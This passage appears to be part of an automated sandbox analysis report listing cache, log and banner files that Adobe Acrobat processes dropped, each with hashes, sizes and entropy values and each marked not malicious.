SSDEEP: | 3:gmUYe65GEjgGuNaAPaU1l9Uqlll/olluxmO+l/SNxOf:jUzSTBuNDPaUW6lAgmOH |
MD5: | 93EFEAD4959ECFBFF1D357BFA49E5476 |
SHA1: | 26DAE9162E4D628F23448BF7C3F30197CB3C34CF |
SHA-256: | C8C50A21EAAE1655A7913A2218B5C7A9890A9C092784E881562B7F4D89414AB3 |
SHA-512: | 0DCAE3E70FE624DAD09F7456D6D3984B2E2F546158A8FAA3A8A6EF5DFF26952F4C5E7F8B961C96C7F6B491852327347CA09136438ECCF8C3FC6471448C33C211 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.128896282476483 |
Encrypted: | false |
SSDEEP: | 6:iO4qV+2Iq2PN72nKuAl9OmbnIFUtSqVQZmwsqVYkwON72nKuAl9OmbjLJ:7nwvVaHAahFUtZQ/LY5OaHAaSJ |
MD5: | 08F01665E7E539D45CF0AA50DBA69C84 |
SHA1: | F86D98D3E691DFEE9132BA65675B87BA93256550 |
SHA-256: | 9D8954622397A45037EE19F2DB7A5643BD8FE880840F9862E578BCE118EBC086 |
SHA-512: | 8203B63B42AC46ED59DA687D65423B6F92EE2ECCAA0FAE1D368F3799E61984F7905A36103CE6ED8DDAC2764B0BE4C7CB999ABBF4888F87A5560A46F783955339 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 298 |
Entropy (8bit): | 5.128896282476483 |
Encrypted: | false |
SSDEEP: | 6:iO4qV+2Iq2PN72nKuAl9OmbnIFUtSqVQZmwsqVYkwON72nKuAl9OmbjLJ:7nwvVaHAahFUtZQ/LY5OaHAaSJ |
MD5: | 08F01665E7E539D45CF0AA50DBA69C84 |
SHA1: | F86D98D3E691DFEE9132BA65675B87BA93256550 |
SHA-256: | 9D8954622397A45037EE19F2DB7A5643BD8FE880840F9862E578BCE118EBC086 |
SHA-512: | 8203B63B42AC46ED59DA687D65423B6F92EE2ECCAA0FAE1D368F3799E61984F7905A36103CE6ED8DDAC2764B0BE4C7CB999ABBF4888F87A5560A46F783955339 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.105348905020798 |
Encrypted: | false |
SSDEEP: | 6:iO4qVBst+q2PN72nKuAl9Ombzo2jMGIFUtSqVnHZZmwsqVYBVkwON72nKuAl9OmT:7nBsovVaHAa8uFUtZnHZ/LE5OaHAa8RJ |
MD5: | C037297CA26F76E91C92F6404AE717A6 |
SHA1: | A1A65365C828578115A489118C30B35C83117844 |
SHA-256: | 0F2EE5765D5ECB3AF9BD54A0BB62C7FFE9E2A2E31A9E05B12509EFCA0B33DE56 |
SHA-512: | ED38385835DE316D4473738A30B3C2809430AE3FE38335F242BA13892008342F4A0780CEDC88B52B53EF4BD3D9246929606417430F59739DEE22B15F82B5B681 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 342 |
Entropy (8bit): | 5.105348905020798 |
Encrypted: | false |
SSDEEP: | 6:iO4qVBst+q2PN72nKuAl9Ombzo2jMGIFUtSqVnHZZmwsqVYBVkwON72nKuAl9OmT:7nBsovVaHAa8uFUtZnHZ/LE5OaHAa8RJ |
MD5: | C037297CA26F76E91C92F6404AE717A6 |
SHA1: | A1A65365C828578115A489118C30B35C83117844 |
SHA-256: | 0F2EE5765D5ECB3AF9BD54A0BB62C7FFE9E2A2E31A9E05B12509EFCA0B33DE56 |
SHA-512: | ED38385835DE316D4473738A30B3C2809430AE3FE38335F242BA13892008342F4A0780CEDC88B52B53EF4BD3D9246929606417430F59739DEE22B15F82B5B681 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\1eea92cd-e101-472d-9b3a-d0624e6dba94.tmp
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 475 |
Entropy (8bit): | 4.962636147346127 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqAsBdOg2Hjcaq3QYiubcP7E4T3y:Y2sRdskdMHa3QYhbA7nby |
MD5: | 7C34A2D4EF48BBEFD6856686645DC9F6 |
SHA1: | 5436A8A34BF2870BCD5BC18D566F8541F342270D |
SHA-256: | 4F5223C8BBC0F6828042E563FA82E2D31453154A4AF0CEC0525E7F4F55CBF241 |
SHA-512: | 8430E460CD02AD00CD9BADDA8F7198A519D2CDC4DDDE390ED1386B64F9A763CF6D9DC71E6CEDD622BE3346CD5F9B96D962FD7900407A43E970742E73FB5929C9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 475 |
Entropy (8bit): | 4.962636147346127 |
Encrypted: | false |
SSDEEP: | 12:YH/um3RA8sqAsBdOg2Hjcaq3QYiubcP7E4T3y:Y2sRdskdMHa3QYhbA7nby |
MD5: | 7C34A2D4EF48BBEFD6856686645DC9F6 |
SHA1: | 5436A8A34BF2870BCD5BC18D566F8541F342270D |
SHA-256: | 4F5223C8BBC0F6828042E563FA82E2D31453154A4AF0CEC0525E7F4F55CBF241 |
SHA-512: | 8430E460CD02AD00CD9BADDA8F7198A519D2CDC4DDDE390ED1386B64F9A763CF6D9DC71E6CEDD622BE3346CD5F9B96D962FD7900407A43E970742E73FB5929C9 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 5449 |
Entropy (8bit): | 5.252263311639509 |
Encrypted: | false |
SSDEEP: | 96:av+Nkkl+2GAouz3z3xfNLUS3vHp5OuDzUrMzh28qXAXFP74LRXOtW7ANwE7UeArk:av+Nkkl+2G1uz3zhfZUyPp5OuDzUwzhB |
MD5: | E408982F239BEA02DA7B0997AA4B957B |
SHA1: | 3737F78A736BFB11EDD60400453B44452967B3B9 |
SHA-256: | 4CB9266463C2FC5BA4FC5B91C3FEE7C533ECE5612A8878247630ADC3FB2A4F18 |
SHA-512: | BD62E194079E0CF1FAEE726279F89C9A41DEE813A72B4184A375D50F38672DF65EC02CB10877924CEF81BFA75E40B3082AE32C9FC97D9C5E8EFABFB74A4B4597 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.085582069998692 |
Encrypted: | false |
SSDEEP: | 6:iO4qV2gV3+q2PN72nKuAl9OmbzNMxIFUtSqV2wZmwsqV2cAVkwON72nKuAl9Ombg:7n2gAvVaHAa8jFUtZ2w/L215OaHAa84J |
MD5: | BA180D7DE87052DD3DA51AB5AB31DAEB |
SHA1: | 7F83BCBA667DD4E90321B0155A244C990D8F9C55 |
SHA-256: | 986319233DCA5B84A7DB29A512082F875849E62136C411D502DA5572D189F749 |
SHA-512: | 7DD7ED4A56D72C5573AC22440C1966234E6A23C33D3F260DDF4CC5AF98233AD0987477D9184BDB798CCA075A6A1FC293F68B035032FF1807F2D2AB42A8C063A8 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 5.085582069998692 |
Encrypted: | false |
SSDEEP: | 6:iO4qV2gV3+q2PN72nKuAl9OmbzNMxIFUtSqV2wZmwsqV2cAVkwON72nKuAl9Ombg:7n2gAvVaHAa8jFUtZ2w/L215OaHAa84J |
MD5: | BA180D7DE87052DD3DA51AB5AB31DAEB |
SHA1: | 7F83BCBA667DD4E90321B0155A244C990D8F9C55 |
SHA-256: | 986319233DCA5B84A7DB29A512082F875849E62136C411D502DA5572D189F749 |
SHA-512: | 7DD7ED4A56D72C5573AC22440C1966234E6A23C33D3F260DDF4CC5AF98233AD0987477D9184BDB798CCA075A6A1FC293F68B035032FF1807F2D2AB42A8C063A8 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 86016 |
Entropy (8bit): | 4.444174677766918 |
Encrypted: | false |
SSDEEP: | 384:Secci5tZiBA7aDQPsknQ0UNCFOa14ocOUw6zyFzqFkdZ+EUTTcdUZ5yDQhJL:86s3OazzU89UTTgUL |
MD5: | 5038EF578B6554B57F9E399E5DC22523 |
SHA1: | 344757B18227C0EEAFE9E457C4AEE91BB1E4BEAC |
SHA-256: | AC6069E67A762BE52B40E137B5997FED4FD88DD7476AEDF3AFF911CB9F73B1A5 |
SHA-512: | 407390CC202EB5AF1C4650DBA9E48C0CED2E6D13F8556A6AAB6E75CB767F6E7DD0EB46DAB21E5A0201C54EE49CBCA92EB32D7C311311263DF1C9B4B58A759EAC |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 8720 |
Entropy (8bit): | 2.2088479091104904 |
Encrypted: | false |
SSDEEP: | 24:7+tKanuwKJlqLLzkrFsgIFsxX3pALXmnHpkDGjmcxBSkomXk+2m9RFTsyg+wmf9I:7MLnCJlqPmFTIF3XmHjBoGGR+jMz+LhK |
MD5: | B7ED58A897796EC73DFEBACF75E744E3 |
SHA1: | 3C952F5FF08034E9E8507A3061AF5BA4B4829DF8 |
SHA-256: | DA458F4B8E101327B4518132A26F8A1D8062DFE95D7A1D8708BCC15AC4260861 |
SHA-512: | BEF89CCE024425F2C2EA46910F83F279362C930702AAE285BB0A3BE8B31EFAAA50C1ECC98CBA60106C3433808A7D88755F3F77DDA7459B38123297B2747A431F |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1391 |
Entropy (8bit): | 7.705940075877404 |
Encrypted: | false |
SSDEEP: | 24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1 |
MD5: | 0CD2F9E0DA1773E9ED864DA5E370E74E |
SHA1: | CABD2A79A1076A31F21D253635CB039D4329A5E8 |
SHA-256: | 96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6 |
SHA-512: | 3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 71954 |
Entropy (8bit): | 7.996617769952133 |
Encrypted: | true |
SSDEEP: | 1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ |
MD5: | 49AEBF8CBD62D92AC215B2923FB1B9F5 |
SHA1: | 1723BE06719828DDA65AD804298D0431F6AFF976 |
SHA-256: | B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F |
SHA-512: | BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 192 |
Entropy (8bit): | 2.7386214950254377 |
Encrypted: | false |
SSDEEP: | 3:kkFklt4A1ltfllXlE/HT8kbtNNX8RolJuRdxLlGB9lQRYwpDdt:kKD0eT88NMa8RdWBwRd |
MD5: | 69197EF381A576DBBBD9F6563A11392F |
SHA1: | CBA1DF4DB9A9CDF37FF536EA0F34A423D4763850 |
SHA-256: | A9B03CF5C78D6A8040E8CB8B4BCA61F3670117B33E5F3AD191AF703D741F5417 |
SHA-512: | 1E922524637ACECCF11493C783E738C3B81D0E160D6151444901C50BBA9CF9501AC8161703FB94962AD2E6B51DD6772B83E67BA83E97A72A8C03D728943DA550 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe |
File Type: | |
Category: | modified |
Size (bytes): | 328 |
Entropy (8bit): | 3.242990426783058 |
Encrypted: | false |
SSDEEP: | 6:kK2DL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:6iDImsLNkPlE99SNxAhUe/3 |
MD5: | 48C93565C4134644A9DE7F3DFA2F1C8A |
SHA1: | 83331A1D91221CEB7ED75510AC67EAD3D3608F38 |
SHA-256: | F5FD547A3685E54D156A2F0A373EDC339F70E60EDC813EF1E63480876CC48792 |
SHA-512: | 8C90A70A09626B63C83510A6CE327874D1FD928BC9F2F4474098D7ECCC6503BD313B37CD350EAE770A82D3DDFFD91556AFE8DE4F3769C8EC5E21E71F30E7BB69 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1233 |
Entropy (8bit): | 5.233980037532449 |
Encrypted: | false |
SSDEEP: | 24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap |
MD5: | 8BA9D8BEBA42C23A5DB405994B54903F |
SHA1: | FC1B1646EC8A7015F492AA17ADF9712B54858361 |
SHA-256: | 862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C |
SHA-512: | 26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 10880 |
Entropy (8bit): | 5.214360287289079 |
Encrypted: | false |
SSDEEP: | 192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp |
MD5: | B60EE534029885BD6DECA42D1263BDC0 |
SHA1: | 4E801BA6CA503BDAE7E54B7DB65BE641F7C23375 |
SHA-256: | B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856 |
SHA-512: | 52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\ACROBAT_READER_MASTER_SURFACEID
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.355297043090953 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJM3g98kUwPeUkwRe9:YvXKXTaGcyhVGMbLUkee9 |
MD5: | 80A1F177CCD701132D2234FD371456E3 |
SHA1: | 72E462FAAB41FDC9CBABD9CF994C06557EB22E50 |
SHA-256: | 2754D1DBD04DD0D0A05BEB6952B5B32D42EE21A589370B63C7823EFB43957004 |
SHA-512: | 605C9CD3D44C3CFA74DDA49F8276DFA91F9C27969FC9FEAE68F67DFBB7E85EE9BB9D41051891F6B28EE01693A2EFABA1139442CDE7828159A03FA1DE9B1E04BC |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Home_View_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.306245700006663 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJfBoTfXpnrPeUkwRe9:YvXKXTaGcyhVGWTfXcUkee9 |
MD5: | B70F954C6CF34CEE61C7C4DAB22047F8 |
SHA1: | 830A212E29F0003A272AD713BDE510F6A5974BAD |
SHA-256: | 7C81849C840F3273681ADF6B738CC742042A5FFA7BC56C0019827B98926C9050 |
SHA-512: | 77691A6D840FA274B18A39F7E85CFE4BBF0EA4E827BC40512095079AB6DDB57C2F2F1C967B16A7C14D085597D2B4A9E726C68C5C715C0D4A1F110532FD92766B |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_FirstMile_Right_Sec_Surface
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 294 |
Entropy (8bit): | 5.28438461475193 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJfBD2G6UpnrPeUkwRe9:YvXKXTaGcyhVGR22cUkee9 |
MD5: | 3DE48F10A0606ACFA71800B6E76A87DF |
SHA1: | EA5CD4D9C44A2E26A84FEAFF421EBB7B69AC0CA2 |
SHA-256: | 2CF945CAE275C3F4812522DD37C3203AAD09E7AF2832FFED62B51265E7217074 |
SHA-512: | DD437DD1A2A07BD01CB87FFE54D9C8BCB4E1C2F16F77F1E399E75A358F8D2DB5B1CAD57D173D58CEA7BAF4D041E892BB281DB57D21B36DD8462334577FE96F84 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_READER_LAUNCH_CARD
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 285 |
Entropy (8bit): | 5.335036589168004 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJfPmwrPeUkwRe9:YvXKXTaGcyhVGH56Ukee9 |
MD5: | CC799D253013B4DAF2CCA770C1486231 |
SHA1: | A9C3A8BFE8702E5EF25C8A0A75602BB71920E971 |
SHA-256: | C71CD5ED024A68A88EE90BEFD490DBD0D872E6E4F1F55F5C5495CFB17BBB86D5 |
SHA-512: | 5065BEBF275C9FCF9A5B01FDE48F97D6BEF1E44D32C47CC709A102DD596E886727570A99C93E66131C6460A3324591A80C3D3924A241789CEFA41D3946B63BFF |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Convert_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1123 |
Entropy (8bit): | 5.683773761390836 |
Encrypted: | false |
SSDEEP: | 24:Yv6XTkm6pLgE9cQx8LennAvzBvkn0RCmK8czOCCSkd:Yva6hgy6SAFv5Ah8cv/kd |
MD5: | ED29BE2A560D6FEBA83FE41A8AEED273 |
SHA1: | 23143924985EDBF09DCFB0F82F7ADC329D72B2BC |
SHA-256: | FAE6D77977C5EADA3AFBAE96D922799C2C74FDC5FFAB775D8AF096684A0F9A3B |
SHA-512: | 4CFF3E9FE807B98F85880256966D33CD5E44B328F9F41AB0F456873405A39BF0E06951FE4FDE1BE36932F4BF5142A1C098DE90EB299018BB1FEAAD1A5A52B8C7 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.282083699730039 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJf8dPeUkwRe9:YvXKXTaGcyhVGU8Ukee9 |
MD5: | 1902479FB824DAA03A5307DC5CFA5693 |
SHA1: | 5456F4150A2201709A6F75868C47AA9325E031FB |
SHA-256: | F4F9D7E8F6E1CDB689C84214750ACDF7B252142DC3495C333155B8960E76A4A0 |
SHA-512: | 58B1275B3D4E51646BA2A0F8F27EE5107C7CC94E695A0EE34F6288F0B069AD48C72AA475D12D69CCC1DE8749B9F064AE8467B75C8194D588E0700E30F96E6D06 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Disc_LHP_Retention
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 292 |
Entropy (8bit): | 5.285210822846359 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJfQ1rPeUkwRe9:YvXKXTaGcyhVGY16Ukee9 |
MD5: | 0B7599570E42848FE4DADF94D90D67C6 |
SHA1: | 65DC8F1B67C7099FB7610A447D8A645FEDF28BB8 |
SHA-256: | 199F43D4B9D131511465EE5FB7581FB7D8AA6F179EA9FCC6E687243C50662CF0 |
SHA-512: | 16C5E3FDAD1AAFBA2E6F57E3ED52471E47EB8C578891DD43A12DF0033C489F8988028B2317F0EA576C81758702F2384CA3A57C7486663AE265C8C224EAAAD5E3 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Edit_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.292186786616573 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJfFldPeUkwRe9:YvXKXTaGcyhVGz8Ukee9 |
MD5: | F8EA196007645F53630C802F5483385C |
SHA1: | F36179A7513E694D16F6EB4F5DFA4D9119E2A1B5 |
SHA-256: | D5B3D411F4D08E485AEFEC8DFAFB89334A0AB2AD8848F84F4B123C2A98E479A0 |
SHA-512: | 9AA0347DCD561D043D3F291323FF10A5CA0BDDE72BE2C9920E694863F311D7E013B96FAB0194A1992F60E8DE014B824AC58F5F162BCA068473480666F9048A56 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_Home_LHP_Trial_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 295 |
Entropy (8bit): | 5.309298036581314 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJfzdPeUkwRe9:YvXKXTaGcyhVGb8Ukee9 |
MD5: | 1D359F81FEBE84748C19FD3B84BF3E8C |
SHA1: | C7B8F7CFA95EB88EA716753BE4961E37C563D302 |
SHA-256: | 21D88050665FC00266C4502C514A4404B6225001D3A91DEF0942FDFB9F2CCE10 |
SHA-512: | E055107803CBD61DA0C711FFAE22C7E39851B2FE0ACD738B8CCE9296E4D72A29878B72EE63C2CF340C7F85ED26F0C77F74746A98F23AC282E4499BBFD4BB2B1A |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_More_LHP_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 289 |
Entropy (8bit): | 5.290010282810839 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJfYdPeUkwRe9:YvXKXTaGcyhVGg8Ukee9 |
MD5: | CD396CB9FB331C1231E84C9CC98403D0 |
SHA1: | ABF91CB28A5A0A74BDD47C7D2E77CF8B8ACF519F |
SHA-256: | 5C2396E90DFE175A19960D7F857814DFE752DDCB88F46553DB9BEC23F080BC93 |
SHA-512: | 903A5F9200C0C621184D1104A2C20A7AAD8257ADA3BDC9BDAEAB47C35EECA08A4C8513160978F93959D2786B6538D9FC5C7C4527BA9099D108F3EF9E0312179F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 284 |
Entropy (8bit): | 5.276183771258728 |
Encrypted: | false |
SSDEEP: | 6:YEQXJ2HXTBIdNGnZiQ0YpheoAvJf+dPeUkwRe9:YvXKXTaGcyhVG28Ukee9 |
MD5: | 62960549A454057325D5B2E9DE8FE34C |
SHA1: | 8E1848A6290F82E4B8F0A5F4E8575F8C8B8412CD |
SHA-256: | D8FD66B481A38811F9F53257F787925932494A9BB37C0C6633A0E2A674DE0ECC |
SHA-512: | 5B95E1B84A6EA5794352D2D724051DD739011A6D91A99F1634F16901FD22636013B64E0713DCFC43071A141485F99CF3AE832AF76C653379F8C0977C2E4AAF31 |
Malicious: | false |
Preview: |
C:\Users\user\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\Files\DC_Reader_RHP_Intent_Banner
Download File
Process: | C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe |
File Type: | |
Category: | dropped |
